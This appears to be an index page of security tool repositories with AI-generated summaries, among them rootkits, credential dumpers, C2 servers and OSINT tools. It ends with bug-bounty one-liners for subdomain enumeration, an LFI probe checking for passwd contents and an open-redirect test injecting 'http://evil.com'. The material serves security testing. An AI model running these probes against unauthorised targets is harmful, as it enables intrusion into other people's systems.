AI Summary: The Microsoft Wont-Fix List is a compilation of vulnerabilities and design flaws that Microsoft has identified but does not intend to address. It serves as a resource for cybersecurity professionals to be aware of potential security risks, including various types of privilege escalation and remote code execution vulnerabilities, along with details on their exploitation mechanisms. Notable features include a categorization of the vulnerabilities by attack type and associated CVEs, providing critical information for risk assessment and mitigation strategies.

mihari

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mihari is an OSINT query aggregator designed for threat hunting, enabling users to perform multiple searches across various data services using a single rule and store the findings in a database. It supports numerous services, including Censys, VirusTotal, and Shodan, facilitating comprehensive data collection and analysis for enhanced cybersecurity investigations. Notable features include support for diverse OSINT sources, integrated persistence for findings, and robust documentation for user guidance.

Millennium

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Millennium is an open-source low-code framework that enables users to create, manage, and utilize plugins and themes for the desktop Steam Client without complex system interactions. Key features include a TypeScript frontend and Lua backend architecture, the ability to customize themes with JavaScript and CSS, and a curated Plugin Database to ensure version compatibility and stability when enhancing the Steam experience. This framework simplifies modding for users, allowing extensive personalization while avoiding low-level code manipulation.

mimipenguin

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MimiPenguin is a Linux tool designed to extract cleartext login passwords from the currently logged-in desktop user by dumping process memory. It utilizes a probability-based method to identify possible passwords by cross-referencing hashes from the /etc/shadow file and performing regex searches. Notably, version 2.0 features a C implementation aimed at enhancing speed and portability, while it maintains support for various desktop environments and authentication types including Gnome Keyring and LightDM.

misconfig-mapper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Misconfig Mapper is a CLI tool developed by Intigriti designed to automate the detection and resolution of common security misconfigurations across various services and technologies. It leverages a flexible template-based system stored in services.json, allowing users to easily add new services and perform extensive checks tailored to their specific environments. Key features include service enumeration, customizable detection templates, and the option to check only for service presence without performing misconfiguration assessments.

MISP

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MISP is an open-source threat intelligence sharing platform designed for incident analysts and cybersecurity professionals to collect, store, and share information regarding cyber threats and incidents. Its notable features include a comprehensive database for managing both technical and non-technical data, a flexible reporting system, and an automatic correlation engine that identifies relationships among threat indicators, enhancing collaboration within the security community. MISP supports integration with various security systems such as NIDS and SIEMs to facilitate efficient threat response and analysis.

mitaka

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mitaka is a browser extension designed to facilitate OSINT (Open Source Intelligence) searches and scans by automating the selection and refanging of indicators of compromise (IoCs). It supports over 65 services and various IoCs including domains, email addresses, and cryptographic hashes, enhancing the efficiency of threat intelligence gathering and analysis for cybersecurity professionals. Notable features include automatic IoC parsing and integration with multiple search engines for quick data retrieval.

MobileApp-Pentest-Cheatsheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Mobile Application Penetration Testing Cheat Sheet serves as a comprehensive resource for security professionals, offering a concise compilation of essential information and checklists for mobile app penetration testing, aligned with the OWASP Mobile Risk Top 10. It encompasses detailed methodologies for both Android and iOS applications, covering aspects such as static and dynamic analysis, network security testing, and techniques for bypassing common security measures. Notable features include a section on mobile security testing distributions and frameworks, providing users with tailored tools and environments to facilitate effective security assessments.

Modlishka

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Modlishka is an open-source penetration testing tool that operates as a man-in-the-middle proxy, allowing seamless proxying of multi-domain HTTP and HTTPS traffic without requiring client certificate installation. Its primary use case is in security testing, particularly for ethical phishing assessments and 2FA bypass demonstrations, providing features such as pattern-based JavaScript payload injection, user credential harvesting, and extensive support for various 2FA schemes. Additionally, Modlishka’s modular and stateless design enhances scalability, while its cross-platform compatibility ensures usability across major operating systems.

mongoaudit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: mongoaudit is a command-line interface tool designed for auditing MongoDB servers to identify security misconfigurations and vulnerabilities. Its primary use case is to enhance security by detecting poor configuration settings and providing actionable advice to rectify them, thus helping administrators implement best practices. Notable features include automated penetration testing capabilities and comprehensive reporting with guidance on securing MongoDB installations.

README

mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.

monkey

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Infection Monkey is an open-source adversary emulation platform designed to enhance security postures by simulating malware behavior within a network. It employs a dual-component architecture comprising an Agent, which mimics a network worm’s propagation techniques, and a centralized command and control server, Monkey Island, for monitoring and visualization. Notable features include various exploitation methods like Log4Shell and RDP, along with adaptive strategies to assess and improve security defenses against real threats.

monkey365

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Monkey365 is an open-source PowerShell module designed for security configuration reviews of Microsoft 365, Azure, and Microsoft Entra ID environments. It enables users to identify potential security misconfigurations and provides actionable recommendations for compliance with best practices. Notable features include its user-friendly approach that minimizes the need for in-depth knowledge of APIs and complex dashboards while facilitating comprehensive scans for security gaps.

README

MonkeyDev

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MonkeyDev is an enhanced version of iOSOpenDev designed for non-jailbroken iOS plugin development. It allows developers to easily create and inject tweaks using Xcode, offering support for CaptainHook and Logos, as well as providing tools for debugging and patching apps without jailbreaking. Notable features include automatic integration of class-dump, restore-symbol, and Reveal, as well as a private CocoaPods repository for managing non-jailbroken plugins.

README

MonkeyDev

A modified version of iOSOpenDev

moonwalk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Moonwalk is a lightweight tool designed for penetration testing on Unix systems, enabling users to erase their traces during exploitation by restoring system logs and filesystem timestamps to their previous state. Key features include a fast execution time of under 5 milliseconds, the ability to save and revert user shell history, and a world-writable path for session logging, ensuring that no evidence of the testing remains.

README

`moonwalk`

Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps.

mosint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mosint is an automated Open Source Intelligence (OSINT) tool designed for efficient email investigations and scanning. It consolidates various services to validate emails, check for social media accounts, investigate data breaches, and extract associated information rapidly, all while being lightweight and user-friendly. Notable features include email verification, data breach checks, Pastebin scans, DNS/IP lookups, and the ability to output results in JSON format.

README

Features • Installation • Services • Usage • Docker • Config • Screen

Mr.Holmes

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mr.Holmes is an OSINT information gathering tool designed for collecting data about domains, usernames, and phone numbers using publicly available resources and Google dorks. Notable features include the use of proxies for anonymous requests and integration with a WhoIS API for enhanced domain information retrieval. The tool is aimed at educational and research purposes, although accuracy may vary.

README

msdat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MSDAT (Microsoft SQL Database Attacking Tool) is an open-source penetration testing utility designed for assessing the security of Microsoft SQL databases remotely. Its primary use case includes discovering valid credentials, privilege escalation, and executing operating system commands through various SQL features. Notable features of MSDAT include the ability to perform dictionary attacks, capture SMB authentication, execute SQL requests, and manipulate files on the server, while supporting multiple Microsoft SQL Server versions.

mssqlproxy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: mssqlproxy is a lateral movement tool designed to facilitate access through a compromised Microsoft SQL Server by utilizing socket reuse. It operates with sysadmin privileges and comprises a CLR assembly, a core DLL, and a client, allowing users to install and manage proxy services for connecting to external systems. Notable features include remote DLL management, commands for file transfer, and options for configuring local listening ports, although it currently supports only IPv4 connections.

mtasa-blue

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Multi Theft Auto: San Andreas (MTA) is an open-source modification that enables multiplayer gameplay for the single-player version of Grand Theft Auto: San Andreas through an advanced game engine framework. It incorporates networking and GUI rendering capabilities while allowing extensive customization via a Lua scripting language, making it possible to create custom game modes and content for multiple players. Notable features include code injection techniques for game manipulation without altering original files, a robust resource management system for asynchronous content delivery, and a collaborative community for development and support.

my-arsenal-of-aws-security-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: My Arsenal of AWS Security Tools is a curated collection of open-source tools designed to enhance security in AWS environments through various functionalities, including defensive hardening, offensive testing, and security auditing. Notable features include comprehensive coverage of cloud security best practices and continuous monitoring capabilities, facilitating improved incident response and compliance with standards such as CIS and GDPR. This repository serves as a resource for security practitioners aiming to bolster their AWS security posture.

MyIP

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MyIP is a multifaceted IP toolbox that enables users to view and analyze their IP addresses, perform network diagnostics, and check website accessibility. Its notable features include detailed IP information retrieval, DNS leak testing, speed testing, and support for multiple languages, along with additional functionalities like proxy rule testing and a cybersecurity checklist. The tool is designed to be user-friendly, featuring dark mode, minimalist mobile optimization, and a Progressive Web App (PWA) support for enhanced accessibility.

MySQL_Fake_Server

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MySQL Fake Server is a tool designed for penetration testing, specifically emulating a MySQL server to exploit vulnerabilities related to file reading and Java deserialization in MySQL JDBC clients. Notable features include the ability to read large binary files, support for custom configuration through a JSON file, and the option to preview or save the contents of read files, all implemented in pure Python 3 without external dependencies.

n0kovo_subdomains

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: n0kovo_subdomains is a comprehensive subdomain enumeration wordlist containing 3,000,000 entries sourced from SSL certificate data across the entire IPv4 space. This tool is designed to enhance the efficacy of subdomain discovery activities for penetration testing and security assessments, utilizing a robust dataset that offers a balanced trade-off between size and search effectiveness. Users can leverage this highly efficient wordlist to improve the success rate of finding subdomains in various target domains.

Name-That-Hash

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Name-That-Hash is a modern hash identification tool designed to accurately identify various hash types, such as MD5 and NTLM. Its notable features include popularity ratings to prioritize common hashes, hash summaries for informed selection, accessible color output, and JSON-based API access for integration into other projects. The tool is intended to provide a more user-friendly and up-to-date alternative to older hash identification systems.

README

➡️ Discord | Website ⬅️

The Modern Hash Identification System
pip3 install name-that-hash && nth
Web App with no install needed

netcat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Netcat for Windows is a TCP/IP utility designed for network diagnostics and exploration, functioning as a versatile “Swiss Army knife” for admins on the Windows platform. It supports both inbound and outbound connections over TCP or UDP, features built-in port scanning, DNS checks, and allows for custom local network configurations. Notably, this version excludes the potentially insecure -e switch to mitigate false positives from antivirus software, while also resolving issues encountered during telnet sessions.

NetExec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NetExec is a community-driven network exploitation tool derived from the predecessor CrackMapExec, designed to facilitate network enumeration and execution of various tasks across multiple hosts. It boasts functionalities for maintaining and expanding the original tool’s capabilities, alongside regular updates and community contributions. Notable features include an emphasis on user collaboration, a dedicated Discord channel for support, and extensive documentation in development.

README

🚩 This is the open source repository of NetExec maintained by a community of passionate people

netlas-cookbook

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Netlas Cookbook serves as a comprehensive guide for utilizing Netlas Search Tools, aimed at audiences with varying levels of cybersecurity knowledge. It provides practical examples and automation techniques for searching and analyzing IP addresses and domain data on the Internet, while also detailing the use of the Netlas API for advanced queries and OSINT tasks. Key features include search query syntax explanation, logical operators, and integration with Python, enhancing user capabilities in attack surface management and information retrieval.

NETReactorSlayer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NETReactorSlayer is an open-source deobfuscator and unpacker specifically designed for Eziriz .NET Reactor, facilitating the process of reversing obfuscated .NET applications. This tool offers both a graphical user interface (GUI) and a command-line interface (CLI), enabling flexible usage depending on user preference. Notable features include comprehensive documentation, community contributions, and adherence to the GPLv3 license, ensuring wide accessibility and support for developers.

README

.NETReactorSlayer

NETReactorSlayer is an open source (GPLv3) deobfuscator and unpacker for Eziriz .NET Reactor.

Nettacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OWASP Nettacker is an automated penetration testing and information-gathering framework designed for cybersecurity professionals to conduct reconnaissance, vulnerability assessments, and network security audits. Key features include a modular architecture for customizable task execution, support for multi-protocol and multithreaded scanning, comprehensive output formats, and a user-friendly interface for managing scans, all of which enhance its efficacy in identifying weaknesses across diverse systems and applications.

README

OWASP Nettacker

NeuroSploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NeuroSploit v3 is an AI-powered penetration testing platform designed for autonomous security assessments, offering support for 100 vulnerability types within isolated Kali Linux containers. Key features include an autonomous agent for parallel testing, an exploit chain engine, anti-hallucination controls, real-time monitoring via a modern web interface, and multi-provider LLM integration for adaptive scanning strategies. The tool provides efficient scanning capabilities and detailed reporting, making it suitable for comprehensive security evaluations.

Nginx-Lua-Anti-DDoS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Nginx-Lua-Anti-DDoS is a protective tool designed for Nginx web servers, leveraging Lua scripting to mitigate DDoS attacks through a JavaScript-based authentication puzzle inspired by Cloudflare’s “I’m Under Attack” mode. The tool features automatic detection and activation of protection mechanisms against various attack types, extensive IP and User-Agent filtering options, as well as capabilities to inspect and block malicious HTTP requests. With no limitation on attack size and built-in logging for monitoring, it offers customizable error responses and caching optimizations to enhance web server performance during attacks.

ngrev

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ngrev is a graphical tool designed for the reverse engineering of Angular projects, enabling users to navigate application structures and visualize the relationships between modules, providers, and directives through static code analysis, eliminating the need to execute the application. Notable features include support for custom theming, compatibility with Angular’s Ivy compiler, and integration with Angular CLI for streamlined project selection.

README

ngrev

Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs static code analysis which means that you don’t have to run your application in order to use it.

Nidhogg

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Nidhogg is a versatile kernel-level rootkit designed for Windows 10 and 11, enabling a wide array of operations directly from kernel space. Its primary use case is to facilitate stealthy and powerful control over system processes, threads, files, and registry items, featuring advanced capabilities such as process hiding, memory scanner bypassing, and credential dumping. Notable features include a built-in AMSI bypass, support for reflective loading, and a Nidhogg Object File (NOF) for custom kernel-mode code execution, enhancing its integration with command-and-control (C2) frameworks.

nishang

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Nishang is a comprehensive PowerShell framework designed for offensive security, penetration testing, and red teaming, featuring a collection of scripts and payloads that assist in various stages of penetration testing. It allows users to execute scripts in memory to bypass antivirus detection and includes notable functionalities such as encoding commands, webshell capabilities, and Active Directory manipulation tools. The framework is structured for ease of use with PowerShell, offering detailed help for individual scripts and versatile execution methods.

nmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Ullaakut/nmap library offers Go developers a comprehensive interface to leverage the features of the Nmap network scanner within their applications, facilitating the creation of security audit tools. By utilizing the Go language’s capabilities, the library allows for robust network scans, service detection, and easy parsing of XML outputs produced by the Nmap binary. Notable features include support for various scan types and the ability to manage scan timeouts, enhancing both flexibility and performance in penetration testing scenarios.

nmap-formatter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NMAP-Formatter is a versatile tool designed to convert NMAP XML output into various formats such as HTML, CSV, JSON, Excel, and more, facilitating the analysis and reporting of network scan results. Notable features include support for output via stdin, the ability to generate diagrams using Graphviz, and options to skip down hosts, enhancing usability for security professionals and network administrators. This tool can also be utilized as a library in Golang for integration into other applications.

nocom-explanation

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: No Comment is a tool designed for analyzing and visualizing gameplay data, specifically focusing on tracking player movements and in-game events within the Minecraft server 2b2t. Its primary use case is to create detailed heatmaps and monitor activity trends, enabling users to comprehend the dynamics of player interactions and exploit occurrences. Notable features include high-resolution visual outputs of player activities and integration with community resources for enhanced data representation.

nodepass

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NodePass is an open-source network tunneling solution that provides enterprise-grade TCP/UDP tunneling with minimal configuration and high performance, designed for managing complex network scenarios. Key features include seamless protocol conversion, a connection pooling architecture for reduced latency, multi-level TLS security mechanisms, and real-time monitoring capabilities. The tool targets DevOps professionals and system administrators, facilitating effortless deployment and control in diverse networking conditions.

README

noir

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OWASP Noir is a security tool designed to analyze source code and generate comprehensive inventories of application endpoints, including the detection of shadow APIs and hidden routes that traditional methods might overlook. It serves as a bridge between Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST), enabling white-box security teams and penetration testers to identify the complete attack surface of an application. Notable features include AI-powered analysis across various programming languages, integration capabilities with popular DAST tools, and the ability to output results in multiple formats for seamless workflow integration.

nomore403

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NoMore403 is a specialized tool for cybersecurity professionals aimed at bypassing HTTP 40X errors during web security assessments. It employs multiple techniques such as header manipulation, method tampering, and custom path testing to automate the bypass process, featuring smart output filtering to highlight significant results and high concurrency for efficient testing. Notable capabilities include auto-calibration, deduplication of results, color-coded output, and customizable payloads for enhanced flexibility.

README

NoMore403

Nope-Proxy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NoPE Proxy is a Burp Suite extension that facilitates the interception and analysis of TCP and UDP traffic, including non-HTTP protocols. Its notable features include a configurable DNS server that routes traffic to Burp, support for multiple listening ports for man-in-the-middle (MiTM) connections, and the ability to define match and replace rules for traffic manipulation. This tool is especially useful for security testing of mobile applications and thick clients, allowing seamless traffic analysis and modification.

noseyparker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Nosey Parker is a command-line interface (CLI) tool designed for scanning textual data to identify secrets and sensitive information, essentially functioning as a specialized grep for secret detection. Targeted primarily at offensive security operations, it offers features such as flexible scanning of various data sources, usage of 188 precision-focused regex rules, deduplication of matches to streamline review processes, and high-speed scanning capabilities, making it suitable for large-scale security engagements. Note that Nosey Parker has been officially retired and replaced by the tool Titus.

NoSQLMap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: NoSQLMap is a Python tool designed for auditing and automating injection attacks on NoSQL databases, primarily targeting MongoDB and CouchDB, while also preparing for support of others like Redis and Cassandra. It helps identify and exploit default configuration vulnerabilities to disclose or replicate database data through a user-friendly menu-based interface. Key features include options for NoSQL DB access attacks, web application attacks, and scanning for anonymous MongoDB access.

npq

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: npq is a tool designed to audit npm packages prior to installation, enhancing security during the package management process. It performs multiple checks, including vulnerability assessments using the Snyk database, package age, popularity metrics, and the presence of essential documentation files. Notable features include an auto-continue mode after warnings and customizable settings for strict security reviews.

README

npq allows you to audit npm packages before you install them

nuclei-wordfence-cve

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Nuclei + Wordfence CVE project provides a comprehensive set of 71,889 Nuclei templates specifically designed for assessing security vulnerabilities in WordPress, including core, plugins, and themes. Notably, the templates are regularly updated to reflect the latest threats identified by Wordfence, offering users a robust tool for proactive site protection and vulnerability identification. This open-source solution allows for customization, giving users the flexibility to adapt templates to meet specific security needs.

o365recon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: o365recon is a PowerShell script designed for retrieving information from Office 365 and Azure AD using valid credentials. Its primary use case is to facilitate information gathering for security assessments, with a notable feature allowing optional Azure querying through a simple command-line interface. The tool requires the installation of MSOnline and AzureAD modules and includes support for multi-factor authentication.

README

o365recon

script to retrieve information via O365 and AzureAD with a valid cred

o365spray

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: o365spray is a specialized tool for username enumeration and password spraying targeting Microsoft Office 365 (O365) environments. It allows users to validate domains, enumerate usernames, and conduct password spraying attacks, featuring configurable options for lockout policies and enumeration modules. The tool emphasizes caution by automatically managing lockout timers during operations to mitigate potential account lockouts.

README

o365spray

o365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365). This tool reimplements a collection of enumeration and spray techniques researched and identified by those mentioned in Acknowledgments.

obfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Obfuscator is a native C++23 code obfuscation tool designed to enhance software security by transforming executable code through various methods such as bogus control flow and constant encryption. Its primary use case is to protect applications from decompilation and reverse engineering, making it compatible with popular disassemblers like IDA and Ghidra. Notable features include customizable function and transform configurations, support for both Linux and Windows platforms, and the ability to specify additional debugging information through PDB and MAP files.

obfuscator-io-deobfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Obfuscator.io Deobfuscator is a tool designed to reverse the obfuscation applied by Obfuscator.io, enabling the recovery of original scripts. Its primary use case is to facilitate code analysis and debugging by recovering strings, removing unnecessary code, and simplifying complex structures without executing untrusted code. Notable features include automatic configuration detection, improved readability through control flow restoration, and compatibility with various forks of the original obfuscator.

README

Obfuscator.io Deobfuscator

A deobfuscator for scripts obfuscated by Obfuscator.io

obliteration

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Obliteration is an open-source PlayStation 4 kernel reimplementation in Rust, designed to enable the execution of dumped PlayStation 4 system software on various operating systems, including Windows, Linux, and macOS. Notable features include cross-platform support with native binaries, near-native performance leveraging hypervisor technologies, and a kernel architecture aimed to closely resemble the original PlayStation 4 kernel for enhanced compatibility. Currently, the project is in early development and does not yet support game execution.

obsidian-osint-templates

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Obsidian OSINT Templates provide structures and frameworks for organizing data during Open Source Intelligence (OSINT) investigations using the Obsidian notetaking tool. Notable features include customizable templates designed to enhance data recording and connection-making, which facilitate efficient analysis and documentation of investigative findings. This resource aims to support both new and experienced users in effectively leveraging Obsidian for their OSINT needs.

README

obsidian-osint-templates

[!info] License Copyright (c) 2024 Micah Hoffman

Octopus

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Octopus is an open-source, pre-operation command-and-control (C2) server developed in Python, designed for red team operations to facilitate initial attacks and information gathering before launching full engagements. It features secure communications through AES-256 encryption, remote command execution, file transfers, and a unique Endpoint Situational Awareness (ESA) capability that allows users to assess target environments effectively. The tool supports multiple Windows versions and enables stealthy operations, making it less detectable by conventional security measures.

odat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool designed to assess the security of Oracle databases remotely. Key features include the capability to identify valid SIDs and credentials, escalate privileges to DBA or SYSDBA, and execute system commands like reverse shells. It supports various Oracle Database versions and offers extensive options for connectivity checks and detailed database information extraction.

README

Quentin HARDY
quentin.hardy@protonmail.com
quentin.hardy@bt.com

ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

offensive-docker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Offensive Docker is a Docker image designed to facilitate the rapid setup of a penetration testing environment by bundling a comprehensive suite of commonly used security tools. Its primary use case is to streamline the pentesting process, featuring tools for port scanning, reconnaissance, web application testing, and brute-forcing, among others. Notably, it allows users to quickly deploy a fully equipped pentesting environment in various cloud platforms, enhancing efficiency in security assessments.

Offensive-OSINT-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Offensive-OSINT-Tools is a curated collection of essential tools tailored for Offensive Security specialists engaged in penetration testing and red teaming. It streamlines the OSINT process by categorizing tools for various purposes, including domain investigation, email address collection, and information gathering. Notable features include the ability to efficiently search for subdomains and URLs, along with a focus on usability by providing only the most relevant tools, rather than an overwhelming list.

Offensive-Resources

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Offensive-Resources V4 is a comprehensive repository designed for offensive security practitioners, providing an extensive collection of learning materials and labs across various cybersecurity domains. Its primary use case is to facilitate skill development in offensive security techniques, with notable features including a wide range of topics from exploit development to IoT and hardware hacking, structured resources for diverse platforms, and an open invitation for community contributions.

README

Offensive-Resources V4

((اللَّهُمَّ انْفَعْنِي بِمَا عَلَّمْتَنِي، وَعَلِّمْنِي مَا يَنْفَعُنِي، وَزِدْنِي عِلْمًا))

OffSec-Reporting

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OffSec Reporting is a customizable platform designed for security professionals to efficiently create penetration test reports tailored for Offensive Security certifications. Built on SysReptor, it enables users to write reports in Markdown, render them as PDFs, and supports various OffSec certifications including OSCP, OSEP, and OSWP. Notable features include free accessibility, rapid report generation, and a focus on facilitating the testing process without the burden of formatting.

README

OffSec Reporting using SysReptor

ofrak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OFRAK (Open Firmware Reverse Analysis Konsole) is a comprehensive binary analysis and modification platform designed specifically for embedded firmware and various binary formats. Its notable features include an interactive GUI for detailed exploration, a Python API for scripting reusable analyses, recursive unpacking and repacking capabilities, and integration with advanced reverse engineering tools such as angr and Ghidra, allowing users to effectively identify, analyze, and modify complex firmware.

README

OFRAK

OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

ohshint.gitbook.io

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OH SHINT is an informational blog focused on open-source intelligence (OSINT) and related topics, including operational security, surveillance, and counter-surveillance techniques. The blog aims to document various resources, tools, and methods for conducting OSINT investigations while sharing insights from the author’s expertise as a licensed private investigator. Notable features include comprehensive write-ups, guides, and resources that cover a wide array of intelligence-related subjects, catering to both amateurs and professionals in the field.

oletools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: oletools is a Python package designed for analyzing Microsoft OLE2 files, including older Microsoft Office documents, MSI files, and Outlook messages, primarily for malware detection, forensics, and debugging. Key features include the ability to detect, extract, and analyze VBA macros, OLE objects, Excel 4 macros (XLM), DDE links, and capabilities for analyzing RTF and OpenXML files. The tool is built on the olefile parser, enhancing its functionality with various detection mechanisms and logging options.

On-Chain-Investigations-Tools-List

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The On-Chain Investigations Tools List is a comprehensive repository designed for conducting thorough investigations into blockchain-related activities. Its primary use case is to provide a curated compilation of tools and resources for tracking crypto hacks, security incidents, and on-chain analysis, featuring various utilities for data analysis, such as Nansen, Dune, and Metasleuth. Notable features include diverse categories of tools, a knowledge hub, and educational articles that guide users in developing effective investigative methodologies.

one_gadget

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OneGadget is a Ruby gem designed for locating one-gadget RCE exploits within libc binaries, simplifying the process for participants in Capture The Flag (CTF) challenges. It leverages symbolic execution to efficiently identify gadgets that result in the execution of /bin/sh, supports multiple architectures (i386, amd64, aarch64), and offers a command-line interface for user-friendly interaction with customizable output options.

README

OneGadget

When playing ctf pwn challenges we usually need the one-gadget RCE (remote code execution), which leads to call execve('/bin/sh', NULL, NULL).

One-Liners

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: One-Liners is a comprehensive toolkit designed for bug bounty hunters, facilitating rapid reconnaissance and vulnerability scanning through efficient one-liner commands. It primarily focuses on subdomain enumeration, open redirect testing, LFI, SSRF, and XSS detection using various profiling tools like subfinder, dnsx, and nuclei. Notable features include integration with multiple API sources for subdomain discovery and streamlined workflows for testing web application vulnerabilities.

README

One-Liners for bug bounty

Thanks to all who create these Awesome One Liners❤️

One Line recon using pd tools

subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt

Subdomain Enumeration

## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u 

## from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=<target.com>&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

## from ThreatMiner
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u

## from Anubis
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"

## from ThreatCrowd
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"

## from HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"

## from AlienVault
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u

LFI:

cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

Open Redirect:

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done

